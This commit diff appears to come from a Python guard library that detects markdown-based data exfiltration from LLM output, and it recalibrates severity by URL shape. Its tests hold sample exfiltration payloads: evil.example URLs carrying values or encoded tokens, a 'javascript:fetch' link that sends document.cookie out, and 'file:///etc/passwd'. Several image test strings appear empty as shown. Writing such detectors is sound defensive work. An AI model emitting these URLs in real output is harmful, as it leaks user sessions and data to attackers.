fix(calibration): grade active content on URL shape, not construct type
v0.3.0 made the untrusted upload path unusable: measured on both doors, an ordinary remote image fail_secure'd and an ordinary link/autolink/refdef quarantined, so only documents without external references persisted. Two independent defects compounded; neither fix works alone: 1. `markdown-image: HIGH` fired on any external image. The exfil primitive is a URL that moves bytes outward, not an image. `is_ordinary_url` now grades on shape - http(s)/protocol-relative, no query, no userinfo, no percent-escape, no opaque host label or path segment -> LOW; anything data-carrying keeps the carrier's severity. raw-html and data: URIs stay HIGH unconditionally. Opacity reuses entropy's primitives; floors calibrated against real doc URLs (worst legit token H=4.08, exfil segments 4.36-4.54) and frozen in calibration. 2. The quarantine_default floor fired on ANY finding, a premise that broke when every ordinary link became a finding. It now fires at MEDIUM+ - a no-op for every detector that shipped before 0.3.0 (no LOW/INFO exists), which is what makes this a patch rather than a minor. The corpus blind spot that let this pass 522 green tests is closed: the FP corpus carries realistic markdown and is asserted on the OUTPUT gate under PRESET_USER_UPLOAD, with a counter-corpus of exfil-shaped URLs that must still block. Beaconing and short opaque segments are conceded in LIMITATIONS and asserted by the coverage matrix rather than papered over. No new public API; no new preset (0.4.0 work); allow_reserved default unchanged.
This commit is contained in:
parent
da7421e6c8
commit
6e9b8168e3
13 changed files with 533 additions and 46 deletions
|
|
@ -16,6 +16,8 @@ wiki content (design principle 5: over-blocking is a failure mode).
|
|||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import pytest
|
||||
|
||||
from llm_ingestion_guard import (
|
||||
scan_active_content,
|
||||
scan_output,
|
||||
|
|
@ -62,7 +64,9 @@ def test_okf_import_flags_body_echoleak():
|
|||
# --- each active-content class surfaces as a finding -------------------------
|
||||
|
||||
def test_inline_link_is_reported_medium():
|
||||
report = scan_active_content("click [here](https://evil.example/go) now")
|
||||
# Click-required carrier -> MEDIUM when the URL can carry a value outward.
|
||||
# (The ordinary form of the same construct is LOW; see the shape tests.)
|
||||
report = scan_active_content("click [here](https://evil.example/go?d=account) now")
|
||||
link = [f for f in report.findings if f.label == "active:markdown-link"]
|
||||
assert len(link) == 1
|
||||
assert link[0].severity is Severity.MEDIUM
|
||||
|
|
@ -128,6 +132,97 @@ def test_benign_formatting_html_is_not_flagged():
|
|||
assert report.found is False
|
||||
|
||||
|
||||
# --- URL shape: severity tracks what the URL can CARRY (0.3.1) ---------------
|
||||
# 0.3.0 graded on construct type, so ``
|
||||
# — a URL that carries nothing outward — was HIGH and fail-secured every ordinary
|
||||
# document on the upload preset. Severity now grades on URL *shape*: an ordinary
|
||||
# external URL (bare path, no query, no opaque segment) is LOW; a URL that can
|
||||
# move bytes outward keeps the carrier's full severity.
|
||||
|
||||
_ORDINARY = [
|
||||
("image", "", "active:markdown-image"),
|
||||
("link", "See [the guide](https://learn.microsoft.com/en-us/azure/overview).", "active:markdown-link"),
|
||||
("autolink", "Spec: <https://example.com/spec/v2>", "active:autolink"),
|
||||
("refdef", "[guide]: https://example.com/docs/deployment-guide", "active:reference-link"),
|
||||
]
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,text,label", _ORDINARY, ids=[c[0] for c in _ORDINARY])
|
||||
def test_ordinary_external_url_is_low(cid, text, label):
|
||||
finding = [f for f in scan_active_content(text).findings if f.label == label]
|
||||
assert len(finding) == 1, f"{cid}: {label} not reported at all"
|
||||
assert finding[0].severity is Severity.LOW, f"{cid}: {finding[0].severity}"
|
||||
|
||||
|
||||
_EXFIL_SHAPED_URLS = [
|
||||
("query-carries-value", "https://evil.example/collect?d=account-identifier"),
|
||||
("base64-path-segment", "https://evil.example/c3RvbGVuIHNlc3Npb24gdG9rZW4gdmFsdWU/p.png"),
|
||||
("hex-id-path-segment", "https://evil.example/d41d8cd98f00b204e9800998ecf8427e/p.png"),
|
||||
("percent-encoded-path", "https://evil.example/p/%73%65%63%72%65%74%76%61%6c%75%65"),
|
||||
("opaque-subdomain", "https://c3RvbGVuIHNlc3Npb24gdG9rZW4gdmFsdWU.evil.example/p.png"),
|
||||
("userinfo-authority", "https://token:s3cr3tvalue@evil.example/p.png"),
|
||||
]
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,url", _EXFIL_SHAPED_URLS, ids=[c[0] for c in _EXFIL_SHAPED_URLS])
|
||||
def test_exfil_shaped_image_keeps_high(cid, url):
|
||||
finding = [f for f in scan_active_content(f"").findings
|
||||
if f.label == "active:markdown-image"]
|
||||
assert len(finding) == 1, f"{cid}: image not reported"
|
||||
assert finding[0].severity is Severity.HIGH, f"{cid}: downgraded to {finding[0].severity}"
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,url", _EXFIL_SHAPED_URLS, ids=[c[0] for c in _EXFIL_SHAPED_URLS])
|
||||
def test_exfil_shaped_link_keeps_medium(cid, url):
|
||||
finding = [f for f in scan_active_content(f"[x]({url})").findings
|
||||
if f.label == "active:markdown-link"]
|
||||
assert len(finding) == 1, f"{cid}: link not reported"
|
||||
assert finding[0].severity is Severity.MEDIUM, f"{cid}: downgraded to {finding[0].severity}"
|
||||
|
||||
|
||||
def test_fragment_is_not_treated_as_carrying():
|
||||
# A fragment never reaches the server, so it cannot carry data to the host a
|
||||
# renderer auto-fetches — and `…/overview#section` is the most common shape
|
||||
# in real documentation. The link-click nuance (an attacker page's JS *can*
|
||||
# read location.hash) is a documented residual, not a severity here.
|
||||
finding = [f for f in scan_active_content(
|
||||
"[prereqs](https://learn.microsoft.com/en-us/azure/overview#prerequisites)"
|
||||
).findings if f.label == "active:markdown-link"]
|
||||
assert finding and finding[0].severity is Severity.LOW
|
||||
|
||||
|
||||
def test_non_http_scheme_is_never_ordinary():
|
||||
# Only http(s) and protocol-relative URLs have an "ordinary" form. Anything
|
||||
# else (javascript:, ftp:, file:, ...) keeps the carrier's full severity
|
||||
# whatever its path looks like.
|
||||
for url in ("javascript:alert(1)", "ftp://example.com/pub/file.txt", "file:///etc/passwd"):
|
||||
finding = [f for f in scan_active_content(f"[x]({url})").findings
|
||||
if f.label == "active:markdown-link"]
|
||||
assert finding and finding[0].severity is Severity.MEDIUM, url
|
||||
|
||||
|
||||
def test_raw_html_and_data_uri_stay_high_regardless_of_url_shape():
|
||||
# These are active whatever the URL carries: a raw <img> is fetched by the
|
||||
# renderer and a data: URI executes its own payload. No ordinary form exists.
|
||||
html = [f for f in scan_active_content('<img src="https://example.com/logo.png">').findings
|
||||
if f.label == "active:raw-html"]
|
||||
assert html and html[0].severity is Severity.HIGH
|
||||
data = [f for f in scan_active_content("see data:text/plain,hello here").findings
|
||||
if f.label == "active:data-uri"]
|
||||
assert data and data[0].severity is Severity.HIGH
|
||||
|
||||
|
||||
def test_worst_url_in_a_class_sets_severity_and_evidence():
|
||||
# An exfil URL hidden behind an ordinary one must not be masked by first-hit
|
||||
# evidence: the class reports the WORST member, with that member's evidence.
|
||||
text = (" "
|
||||
"")
|
||||
img = [f for f in scan_active_content(text).findings if f.label == "active:markdown-image"][0]
|
||||
assert img.severity is Severity.HIGH
|
||||
assert img.count == 2
|
||||
assert "evil" in (img.evidence or ""), img.evidence
|
||||
|
||||
|
||||
# --- counting and evidence hygiene -------------------------------------------
|
||||
|
||||
def test_image_is_not_double_counted_as_link():
|
||||
|
|
|
|||
|
|
@ -60,6 +60,25 @@ def test_active_content_severity_frozen():
|
|||
}
|
||||
|
||||
|
||||
def test_url_shape_thresholds_frozen():
|
||||
# 0.3.1: severity grades on URL shape. These floors sit above every
|
||||
# legitimate documentation URL token measured on 2026-07-25 (worst: H=4.08)
|
||||
# and below the base64/hex payload segments an exfil path uses (4.36-4.54).
|
||||
assert cal.ACTIVE_CONTENT_ORDINARY_SEVERITY is Severity.LOW
|
||||
assert (cal.URL_OPAQUE_ENTROPY_H, cal.URL_OPAQUE_MIN_LEN) == (4.4, 24)
|
||||
assert cal.URL_OPAQUE_HEX_MIN_LEN == 32
|
||||
|
||||
|
||||
def test_no_detector_emitted_low_before_the_url_shape_change():
|
||||
"""The floor change (any finding -> MEDIUM+) is only honest as a *patch* if
|
||||
nothing that shipped before it emitted LOW — otherwise it would silently
|
||||
loosen an existing consumer's gate. The lexicon is the only table-driven
|
||||
severity source; assert it still holds no LOW/INFO pattern."""
|
||||
from llm_ingestion_guard.lexicon import load_lexicon
|
||||
assert not [p for p in load_lexicon()
|
||||
if p.severity in (Severity.LOW, Severity.INFO)]
|
||||
|
||||
|
||||
# --- binding: each detector reads its threshold from calibration ------------
|
||||
# The freeze is meaningful only if the modules actually READ these values. An
|
||||
# import alias binds the SAME object, so identity (`is`) proves the single
|
||||
|
|
@ -97,3 +116,7 @@ def test_disposition_module_sources_from_calibration():
|
|||
def test_active_content_module_sources_from_calibration():
|
||||
from llm_ingestion_guard import active_content
|
||||
assert active_content._SEVERITY is cal.ACTIVE_CONTENT_SEVERITY
|
||||
assert active_content._ORDINARY_SEVERITY is cal.ACTIVE_CONTENT_ORDINARY_SEVERITY
|
||||
assert active_content._OPAQUE_H is cal.URL_OPAQUE_ENTROPY_H
|
||||
assert active_content._OPAQUE_MIN_LEN is cal.URL_OPAQUE_MIN_LEN
|
||||
assert active_content._OPAQUE_HEX_LEN is cal.URL_OPAQUE_HEX_MIN_LEN
|
||||
|
|
|
|||
|
|
@ -22,6 +22,7 @@ import pytest
|
|||
from llm_ingestion_guard import (
|
||||
prepare_input,
|
||||
scan_output,
|
||||
screen_output,
|
||||
decide,
|
||||
Report,
|
||||
Source,
|
||||
|
|
@ -103,6 +104,27 @@ _FALSE_POSITIVE = [
|
|||
'export API_TOKEN="${VAULT_TOKEN}" # injected at deploy time'),
|
||||
("checksum-high-entropy",
|
||||
"Artifact sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"),
|
||||
# --- ordinary markdown: the carriers every real document is made of -------
|
||||
# 0.3.0 shipped with none of these in the corpus, which is how a regression
|
||||
# that fail-secured an ordinary remote image passed a green suite.
|
||||
("doc-ordinary-link",
|
||||
"# Deployment\n\nSee [the deployment guide]"
|
||||
"(https://learn.microsoft.com/en-us/azure/machine-learning/overview) for details.\n"),
|
||||
("doc-ordinary-image",
|
||||
"# Architecture\n\n\n"),
|
||||
("doc-autolink",
|
||||
"# Sources\n\nSpecification: <https://example.com/spec/v2>\n"),
|
||||
("doc-reference-link",
|
||||
"# Notes\n\nSee [the doc][guide] before deploying.\n\n"
|
||||
"[guide]: https://example.com/docs/deployment-guide\n"),
|
||||
("doc-anchor-and-relative",
|
||||
"# Contents\n\n- [When is a DPIA required?](#when-is-a-dpia-required)\n"
|
||||
"- \n- [sibling note](./notes.md)\n"),
|
||||
("doc-mixed-markdown",
|
||||
"# Release notes\n\n- [Table of contents](#table-of-contents)\n"
|
||||
"- [upstream changelog](https://example.com/changelog)\n"
|
||||
"- \n\n"
|
||||
"Archive: <https://example.com/releases>\n"),
|
||||
]
|
||||
|
||||
|
||||
|
|
@ -113,6 +135,68 @@ def test_false_positive_is_not_blocked_under_trusted(cid, text):
|
|||
f"{cid} wrongly disposed {decision.disposition.value}: {decision.reasons}")
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,text", _FALSE_POSITIVE, ids=[c[0] for c in _FALSE_POSITIVE])
|
||||
def test_false_positive_is_not_blocked_on_the_upload_gate(cid, text):
|
||||
"""The blind spot 0.3.0 shipped through: the *output* gate under the *upload*
|
||||
preset. The trusted assertion above cannot see a calibration regression —
|
||||
every non-CRITICAL finding WARNs under trust — and it drives ``_scan_input``,
|
||||
so ``scan_output`` step 6, where ``active_content`` actually lives, was never
|
||||
reached. An ordinary technical document must persist unattended here."""
|
||||
decision = screen_output(text, PRESET_USER_UPLOAD)
|
||||
assert decision.disposition is Disposition.WARN, (
|
||||
f"{cid} wrongly disposed {decision.disposition.value}: {decision.reasons}")
|
||||
|
||||
|
||||
# --- counter-corpus: exfil-SHAPED URLs must keep hard-failing ---------------
|
||||
# The dangerous half of the 0.3.1 recalibration. Loosening ordinary carriers is
|
||||
# only honest if the EchoLeak class still blocks, so every URL form that can
|
||||
# carry bytes outward is asserted here — a false negative reopens CVE-2025-32711.
|
||||
|
||||
_EXFIL_B64 = base64.b64encode(b"stolen session token value").decode().rstrip("=")
|
||||
|
||||
_EXFIL_SHAPED = [
|
||||
("query-carries-value",
|
||||
"",
|
||||
Disposition.FAIL_SECURE),
|
||||
("base64-payload-in-path",
|
||||
f"",
|
||||
Disposition.FAIL_SECURE),
|
||||
("percent-encoded-payload",
|
||||
"",
|
||||
Disposition.FAIL_SECURE),
|
||||
("high-entropy-subdomain",
|
||||
f"",
|
||||
Disposition.FAIL_SECURE),
|
||||
("userinfo-in-authority",
|
||||
"",
|
||||
Disposition.FAIL_SECURE),
|
||||
("raw-html-img-unconditional",
|
||||
'<img src="https://evil.example/pixel.png">',
|
||||
Disposition.FAIL_SECURE),
|
||||
("data-uri-unconditional",
|
||||
"payload data:text/html;base64,PHN2Zz4= end",
|
||||
Disposition.FAIL_SECURE),
|
||||
("exfil-link-carries-value",
|
||||
"[click](https://evil.example/collect?session=abcdefghijklmnop)",
|
||||
Disposition.QUARANTINE_REVIEW),
|
||||
# A `javascript:` URI hard-fails on the lexicon (hybrid-xss:javascript-uri,
|
||||
# HIGH) independently of active_content — recalibrating URL *shape* must not
|
||||
# weaken it, so it is asserted at the disposition it already reaches.
|
||||
("dangerous-scheme-link",
|
||||
"[click](javascript:fetch('https://evil.example/'+document.cookie))",
|
||||
Disposition.FAIL_SECURE),
|
||||
]
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,payload,expected", _EXFIL_SHAPED,
|
||||
ids=[c[0] for c in _EXFIL_SHAPED])
|
||||
def test_exfil_shaped_url_still_blocks_on_the_upload_gate(cid, payload, expected):
|
||||
decision = screen_output(payload, PRESET_USER_UPLOAD)
|
||||
assert decision.disposition is expected, (
|
||||
f"{cid} disposed {decision.disposition.value}, want {expected.value}: "
|
||||
f"{decision.reasons}")
|
||||
|
||||
|
||||
def test_hard_fail_is_an_explicit_opt_in():
|
||||
# the SAME non-critical finding warns under a trusted source but escalates to
|
||||
# quarantine under the high-untrust upload preset — disposition is a policy
|
||||
|
|
|
|||
|
|
@ -197,12 +197,28 @@ def test_guard_disposes_findings_like_decide():
|
|||
|
||||
# --- Presets --------------------------------------------------------------
|
||||
|
||||
def test_user_upload_preset_quarantines_any_finding():
|
||||
# a single LOW finding that would WARN under a plain policy -> QUARANTINE here.
|
||||
report = _report(_finding(severity=Severity.LOW, label="lexicon:soft"))
|
||||
def test_user_upload_preset_holds_medium_for_review():
|
||||
report = _report(_finding(severity=Severity.MEDIUM, label="lexicon:config"))
|
||||
assert decide(report, PRESET_USER_UPLOAD).disposition is Disposition.QUARANTINE_REVIEW
|
||||
|
||||
|
||||
def test_user_upload_floor_does_not_fire_on_a_lone_low_finding():
|
||||
# 0.3.1: the floor fires at MEDIUM+, not on ANY finding. "Any finding ->
|
||||
# review" rested on the premise that findings are the exception; that premise
|
||||
# broke the moment every ordinary markdown link became a (LOW) finding, and
|
||||
# the floor then quarantined documents whose only sin was having a link.
|
||||
report = _report(_finding(severity=Severity.LOW, label="active:markdown-link"))
|
||||
assert decide(report, PRESET_USER_UPLOAD).disposition is Disposition.WARN
|
||||
|
||||
|
||||
def test_quarantine_floor_still_lifts_a_semi_trusted_policy():
|
||||
# The floor is not dead weight: a caller-defined TRUSTED policy that opts into
|
||||
# quarantine_default still lifts a MEDIUM finding that trust alone would WARN.
|
||||
semi_trusted = Policy(trust=Trust.TRUSTED, quarantine_default=True)
|
||||
report = _report(_finding(severity=Severity.MEDIUM, label="lexicon:config"))
|
||||
assert decide(report, semi_trusted).disposition is Disposition.QUARANTINE_REVIEW
|
||||
|
||||
|
||||
def test_user_upload_preset_hard_fails_on_critical():
|
||||
report = _report(_finding(severity=Severity.CRITICAL, label="lexicon:override"))
|
||||
assert decide(report, PRESET_USER_UPLOAD).disposition is Disposition.FAIL_SECURE
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue